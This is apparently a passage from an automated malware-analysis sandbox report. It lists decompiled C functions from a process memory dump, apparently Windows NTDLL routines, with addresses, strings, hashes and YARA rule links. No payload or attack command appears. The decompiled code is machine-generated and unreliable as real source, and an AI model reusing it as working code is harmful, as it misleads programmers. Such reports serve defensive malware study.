										L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L01094620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                                            0x01081b8f
                                                                            0x01081b9a
                                                                            0x01081b9c
                                                                            0x01081b9e
                                                                            0x01081ba3
                                                                            0x010d7010
                                                                            0x010d7010
                                                                            0x00000000
                                                                            0x01081ba9
                                                                            0x01081ba9
                                                                            0x01081bae
                                                                            0x00000000
                                                                            0x01081bc5
                                                                            0x01081bca
                                                                            0x01081bcf
                                                                            0x01081bd0
                                                                            0x01081bd1
                                                                            0x01081bd2
                                                                            0x01081bd6
                                                                            0x01081bdc
                                                                            0x01081be0
                                                                            0x010d6ffc
                                                                            0x010d7000
                                                                            0x00000000
                                                                            0x010d7006
                                                                            0x010d7009
                                                                            0x010d7009
                                                                            0x01081be6
                                                                            0x01081bec
                                                                            0x01081c0b
                                                                            0x01081c0b
                                                                            0x01081c0c
                                                                            0x01081c11
                                                                            0x01081c12
                                                                            0x01081c15
                                                                            0x01081c1b
                                                                            0x01081c1f
                                                                            0x01081c31
                                                                            0x01081c33
                                                                            0x010d7026
                                                                            0x010d7026
                                                                            0x01081c21
                                                                            0x01081c24
                                                                            0x01081c24
                                                                            0x01081bee
                                                                            0x01081bee
                                                                            0x01081bf2
                                                                            0x01081c3a
                                                                            0x01081bf4
                                                                            0x01081bf4
                                                                            0x01081c05
                                                                            0x01081c05
                                                                            0x01081c09
                                                                            0x01081c3e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01081c09
                                                                            0x01081bec
                                                                            0x01081be0
                                                                            0x01081bae
                                                                            0x01081c2e

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: WindowsExcludedProcs
                                                                            • API String ID: 0-3583428290
                                                                            • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                            • Instruction ID: 5611fb23f07ef89243970b3e91128e115c48aa5e5484e568cb80fdcb2df18035
                                                                            • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                            • Instruction Fuzzy Hash: E221F57A60472DEFDB22AA598880F9FBBADAF44651F058465FED4DB200D630DC0297A0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0109F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E0109F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                                            0x0109f71d
                                                                            0x0109f722
                                                                            0x0109f726
                                                                            0x010e4770
                                                                            0x0109f765
                                                                            0x0109f769
                                                                            0x0109f769
                                                                            0x0109f732
                                                                            0x010e477a
                                                                            0x00000000
                                                                            0x010e477a
                                                                            0x0109f738
                                                                            0x0109f73a
                                                                            0x0109f73c
                                                                            0x0109f73f
                                                                            0x0109f746
                                                                            0x0109f778
                                                                            0x0109f7a9
                                                                            0x0109f7a9
                                                                            0x0109f754
                                                                            0x0109f75a
                                                                            0x0109f75d
                                                                            0x0109f75f
                                                                            0x0109f761
                                                                            0x0109f76f
                                                                            0x0109f771
                                                                            0x0109f771
                                                                            0x0109f76f
                                                                            0x0109f763
                                                                            0x00000000
                                                                            0x0109f763
                                                                            0x0109f77d
                                                                            0x0109f7a3
                                                                            0x0109f7a5
                                                                            0x00000000
                                                                            0x0109f7a5
                                                                            0x0109f77f
                                                                            0x0109f782
                                                                            0x0109f784
                                                                            0x0109f786
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0109f788
                                                                            0x0109f748
                                                                            0x0109f74d
                                                                            0x0109f78d
                                                                            0x0109f793
                                                                            0x0109f7b7
                                                                            0x0109f7bc
                                                                            0x00000000
                                                                            0x0109f7bc
                                                                            0x0109f798
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0109f79d
                                                                            0x0109f7b0
                                                                            0x00000000
                                                                            0x0109f7b0
                                                                            0x0109f79f
                                                                            0x00000000
                                                                            0x0109f74f
                                                                            0x0109f74f
                                                                            0x00000000
                                                                            0x0109f74f

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Actx
                                                                            • API String ID: 0-89312691
                                                                            • Opcode ID: 7ea82f00480207f56df827a00786a762322d6e58ff23430b8e89e013f917561b
                                                                            • Instruction ID: 33fa339fa7807c5c4c9e5db703ef210ac37af514b2da4261d1c034f662fb3dd7
                                                                            • Opcode Fuzzy Hash: 7ea82f00480207f56df827a00786a762322d6e58ff23430b8e89e013f917561b
                                                                            • Instruction Fuzzy Hash: 2811B235308B038BEFA54E1D88B473EFED5BB85664F24456AE5E1CB391DB70C840A341
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01128DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 71%
                                                                            			E01128DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x1150d50);
				E010CD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01105720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L010CDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L010CDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E010CD130(_t34, _t39, _t40);
			}





                                                                            0x01128df1
                                                                            0x01128df1
                                                                            0x01128df1
                                                                            0x01128df1
                                                                            0x01128df1
                                                                            0x01128df1
                                                                            0x01128df3
                                                                            0x01128df8
                                                                            0x01128dfd
                                                                            0x01128e00
                                                                            0x01128e0e
                                                                            0x01128e2a
                                                                            0x01128e36
                                                                            0x01128e38
                                                                            0x01128e3c
                                                                            0x01128e46
                                                                            0x01128e46
                                                                            0x01128e36
                                                                            0x01128e50
                                                                            0x01128e56
                                                                            0x01128e59
                                                                            0x01128e5c
                                                                            0x01128e60
                                                                            0x01128e67
                                                                            0x01128e6d
                                                                            0x01128e73
                                                                            0x01128e74
                                                                            0x01128eb1
                                                                            0x01128ebd

                                                                            Strings
                                                                            • Critical error detected %lx, xrefs: 01128E21
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Critical error detected %lx
                                                                            • API String ID: 0-802127002
                                                                            • Opcode ID: 48720bfd85447d0b35fb307305a3f909c49f8f8f3a3b61bd5b24f35f1365ec57
                                                                            • Instruction ID: 8c1db507e1cfc29a59fee1b11aa7ca0519b96e783c4fcec3ff7ab69c69663b78
                                                                            • Opcode Fuzzy Hash: 48720bfd85447d0b35fb307305a3f909c49f8f8f3a3b61bd5b24f35f1365ec57
                                                                            • Instruction Fuzzy Hash: 1B1132B1D14358EADB29DFE889057DCBBB0BB14714F20426EE5A9AB292C3740602CF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0110FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0110FF60
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                            • API String ID: 0-1911121157
                                                                            • Opcode ID: cb2d1107e8541d4f01e293f91ad298d8432bf151298fb411ae52b954c780680d
                                                                            • Instruction ID: fcd850ce0a4352e5bb926ac0e8b49125adb835927cdbb736b129572fd6b5478e
                                                                            • Opcode Fuzzy Hash: cb2d1107e8541d4f01e293f91ad298d8432bf151298fb411ae52b954c780680d
                                                                            • Instruction Fuzzy Hash: 53110472910545EFDB2ADF94C949FDCBBB1FF08B04F148058F508AB1A1C7799941DB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01145BA5, Relevance: .6, Instructions: 592COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3b385cf87433064891d498e64ddc3f115796cfec328aafa752cdcecad0dee353
                                                                            • Instruction ID: 8d0b935d2799ea013946bdaabe2f8240baa57a57701209da9346571a99484ce7
                                                                            • Opcode Fuzzy Hash: 3b385cf87433064891d498e64ddc3f115796cfec328aafa752cdcecad0dee353
                                                                            • Instruction Fuzzy Hash: DF427B71E00269CFDB68CF68C880BA9BBB1FF49704F1581AAD94DEB242D7319985CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01094120, Relevance: .4, Instructions: 444COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1f557bce07a0aeab40aeda453a970a513ee58529578b6ca52848d0f7bfdccc5b
                                                                            • Instruction ID: 110a05070a794fcd01d55d49a3ae54a546354e4c92d00c5d6fe5697a50fb8ecb
                                                                            • Opcode Fuzzy Hash: 1f557bce07a0aeab40aeda453a970a513ee58529578b6ca52848d0f7bfdccc5b
                                                                            • Instruction Fuzzy Hash: 18F16B746083118BCB64CF68C590A7AB7E1FF88714F54896EF9C6CB291E734D882DB52
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010A20A0, Relevance: .4, Instructions: 420COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9085e71cb18783f36ef1ce996070e5f0eefc720067c2c38f553f14bd1c185a08
                                                                            • Instruction ID: 5cbaa32f0c39d9aaefc9022542654aeb485e0f5c8c2832c502d782234a304132
                                                                            • Opcode Fuzzy Hash: 9085e71cb18783f36ef1ce996070e5f0eefc720067c2c38f553f14bd1c185a08
                                                                            • Instruction Fuzzy Hash: 1EF176356083019FDB66CF6CC9447AE7BE1AF85328F4889BDE9D59B281D335D841CB82
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0108D5E0, Relevance: .4, Instructions: 353COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 918021ad971af23e8420088868e2bf46d824d1c75397e9b9775e9f4f14664839
                                                                            • Instruction ID: b3e9b9d02abd4d6cfd9dad20e890363717b3ac98309a45e5ca9a421d14571f88
                                                                            • Opcode Fuzzy Hash: 918021ad971af23e8420088868e2bf46d824d1c75397e9b9775e9f4f14664839
                                                                            • Instruction Fuzzy Hash: 4CE1C330A0835ACFEB75EF58C840BA9B7F1BF46314F0542E9D9C997291DB309981CB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0109B236, Relevance: .3, Instructions: 305COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
                                                                            • Instruction ID: 77fb6026a29102298342b007a775720cf915343f6b1d7594f03dbbca4ee4dace
                                                                            • Opcode Fuzzy Hash: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
                                                                            • Instruction Fuzzy Hash: 67B1B131B006069FDF15DBA9C9A4FBEBBF9EF88214F1441A9E69297381DB30D901DB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0108849B, Relevance: .3, Instructions: 290COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0bdd082d35369b73c691faf070abf3b9a85362a01a6c1cd301c905c5cfda2bab
                                                                            • Instruction ID: 597452800b859130182bc2ce792ab327d7770bcdfc3f5d305ffab83630dd0215
                                                                            • Opcode Fuzzy Hash: 0bdd082d35369b73c691faf070abf3b9a85362a01a6c1cd301c905c5cfda2bab
                                                                            • Instruction Fuzzy Hash: 80B17D71E04309DFDB29EF98C984AEDBBB5FF48308F50812AE585AB345D771A851CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010A513A, Relevance: .3, Instructions: 258COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 237f030c8988501778cf847422efeb77b626f543415a734ed67046c4a604c73e
                                                                            • Instruction ID: 647161957863befb55a5802626c72f68435f1607d38fcd1f73e6710ed91f707b
                                                                            • Opcode Fuzzy Hash: 237f030c8988501778cf847422efeb77b626f543415a734ed67046c4a604c73e
                                                                            • Instruction Fuzzy Hash: A6C121755093818FD354CF29C480A6AFBE1BF89304F544AAEF9D98B392D771E845CB42
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010A03E2, Relevance: .3, Instructions: 254COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7734ec84e2e611f2864e78e88c7b66f34416cd255e29ea360e011a5ebf2dcc55
                                                                            • Instruction ID: f07b9ed351990e4210f4e0907cc9f58b5d49f21924000f559fdd24c43363cbac
                                                                            • Opcode Fuzzy Hash: 7734ec84e2e611f2864e78e88c7b66f34416cd255e29ea360e011a5ebf2dcc55
                                                                            • Instruction Fuzzy Hash: 91912B71E042199FEB329BADC848BEE7BE4AB01714F0502A5FAD0EB2D5DB759C40C781
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0107C600, Relevance: .2, Instructions: 225COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ba8bb9151f26eb37e4ae64284e884eb6e89dfe065faecafd8e1d03fa064abd2a
                                                                            • Instruction ID: f1a7ba57f931445ccf79d53100bd4ab74ba3bcaab26e98da25977acff962c712
                                                                            • Opcode Fuzzy Hash: ba8bb9151f26eb37e4ae64284e884eb6e89dfe065faecafd8e1d03fa064abd2a
                                                                            • Instruction Fuzzy Hash: 9E8192756042428FDB66CE59C884B6EB7E5FF84250F19486AEEC59B241D330ED40CBE2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010A138B, Relevance: .2, Instructions: 206COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
                                                                            • Instruction ID: 88831f01cf1c2ef1c99b55ea8e35c9cb25211295bee87618ba46da9c094f57de
                                                                            • Opcode Fuzzy Hash: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
                                                                            • Instruction Fuzzy Hash: 2581AA75A00345AFCB24CF69C844AEABBF5FF48304F14896AE996C7251D730EA41CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0110B8D0, Relevance: .2, Instructions: 199COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2cd93392520b15377738f590c75a7182ddf849b81312c24f92f4c1e1e137c86d
                                                                            • Instruction ID: 1357b76b13565f41664156aa4bbfc5e21be91a7f96251fe00df1216e42ab2b6b
                                                                            • Opcode Fuzzy Hash: 2cd93392520b15377738f590c75a7182ddf849b81312c24f92f4c1e1e137c86d
                                                                            • Instruction Fuzzy Hash: 2B71247AA04B02EFE73ADF18C840F96BBE5EF44724F154528E655872E0EBB1E940CB54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010F6DC9, Relevance: .2, Instructions: 199COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                            • Instruction ID: 78022add4f2934c0e6b5c550a5308243868ec25c57562ebf9da239abd9e75c92
                                                                            • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                            • Instruction Fuzzy Hash: DA717C71A0060AEFDB11DFA8C984AEEBBF9FF48714F144069E645E7650DB30AA41CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010752A5, Relevance: .2, Instructions: 161COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c9c4052685e7ab159e5ce2bbc1ac2a845fb0361976ab46d8a5bdb884fda527eb
                                                                            • Instruction ID: 32c05d91196f3c39c073e0e0ded33037d9f09deec91ada9e526d5901c51154dd
                                                                            • Opcode Fuzzy Hash: c9c4052685e7ab159e5ce2bbc1ac2a845fb0361976ab46d8a5bdb884fda527eb
                                                                            • Instruction Fuzzy Hash: E151C971204342ABD721AF28C841BABBBE4FF91714F10096EF5D983691E771E840CBA6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010A2AE4, Relevance: .2, Instructions: 159COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 99c2c6924d9e24eb8e09d9a9f99c4e8ea4206885112ff876574ee554d5cd03dc
                                                                            • Instruction ID: 60d56b2d06386dbc8aff38c90e3d364a1a5f3927102027685407f71268e8beda
                                                                            • Opcode Fuzzy Hash: 99c2c6924d9e24eb8e09d9a9f99c4e8ea4206885112ff876574ee554d5cd03dc
                                                                            • Instruction Fuzzy Hash: C051D376B10115CFCB28CF9CC8809BDB7F1FB88700755846AE8969B365D731AA91CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0113AE44, Relevance: .2, Instructions: 152COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d41785148537b366d7e3b34adda938c08f4bde4916b619d4f2a8f143631cfacb
                                                                            • Instruction ID: 22b50304d4941902dca9edfc4b5e375147ae29451e6ce2c8dfa784042780bc41
                                                                            • Opcode Fuzzy Hash: d41785148537b366d7e3b34adda938c08f4bde4916b619d4f2a8f143631cfacb
                                                                            • Instruction Fuzzy Hash: A841F6717042115BD72ECB29E894B3FBB9DAFD4624F044329F996C72D8D734D801C6A2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0109DBE9, Relevance: .1, Instructions: 149COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d4cdfbe9c53adc989c1f6868960bc3b15056e202b0ee2746fb97b8de4d08e8b6
                                                                            • Instruction ID: b0c4bb42f3ab9650d7a3c9303d80c787c0faa2395160208dd9fac68e835cf77a
                                                                            • Opcode Fuzzy Hash: d4cdfbe9c53adc989c1f6868960bc3b15056e202b0ee2746fb97b8de4d08e8b6
                                                                            • Instruction Fuzzy Hash: 1251B2B1A05216DFCF14DFA8C4A0A9EFBF1BF48310F248199D595AB345DB31AD44CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0108EF40, Relevance: .1, Instructions: 147COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                            • Instruction ID: 3ff360f6bddde000c9bbbc3573adfca06cd4dd35d0033eebff6301f12ae3c6fd
                                                                            • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                            • Instruction Fuzzy Hash: 44510630E0824ADFDB61DB6CC0907AEBBF1AF45314F1481E8E5C557282C375A989CB41
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0114740D, Relevance: .1, Instructions: 141COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                            • Instruction ID: 1be4bbdb7991a3291b469d48823ff220af17bac45599a5e87fdefe4eb7b4fbbe
                                                                            • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                            • Instruction Fuzzy Hash: 8E519D71600646EFDB1ACF18C980A96BBB5FF45704F15C0AAE908DF252E371E946CBE0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010A2990, Relevance: .1, Instructions: 133COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 93ff135d5182af6163b3bc145f5b37d35d73b6991cba088cef70f9c9c6fd3a76
                                                                            • Instruction ID: 0a3df695a519cbf30f2408f0a84ff46a68eda252a3b33cd96def493967d510e6
                                                                            • Opcode Fuzzy Hash: 93ff135d5182af6163b3bc145f5b37d35d73b6991cba088cef70f9c9c6fd3a76
                                                                            • Instruction Fuzzy Hash: B4519A71A0020AEFDF25DF99C890ADEBBB5FF18710F558165E984AB220D3319D52CFA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010A4BAD, Relevance: .1, Instructions: 131COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6d01ddc1918f37494c623dba09b76c6e3d42af8e5bf9b4e19852e1fa4d6354f1
                                                                            • Instruction ID: a704710fbc569fee17706c33ff6cb584eb65982a3f459461e2a71d3525193cda
                                                                            • Opcode Fuzzy Hash: 6d01ddc1918f37494c623dba09b76c6e3d42af8e5bf9b4e19852e1fa4d6354f1
                                                                            • Instruction Fuzzy Hash: 1141D035A402299FDB61DFA8C944BEEB7F4FF55700F4400A5E988EB241EB749E80CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010A4D3B, Relevance: .1, Instructions: 131COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 67b9a600d2b52f6faec0635a58ad42c7c66592e140154b84b77f277951c559f2
                                                                            • Instruction ID: d65dc25bbef4f75075218881f788ab4c4447a618cff1216d9517186dd45e16ad
                                                                            • Opcode Fuzzy Hash: 67b9a600d2b52f6faec0635a58ad42c7c66592e140154b84b77f277951c559f2
                                                                            • Instruction Fuzzy Hash: 4741D475A403189FEB31DF58CC80FAAB7E9EB54710F4440A9EA85DB281D7B1ED44CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01088A0A, Relevance: .1, Instructions: 120COMMON
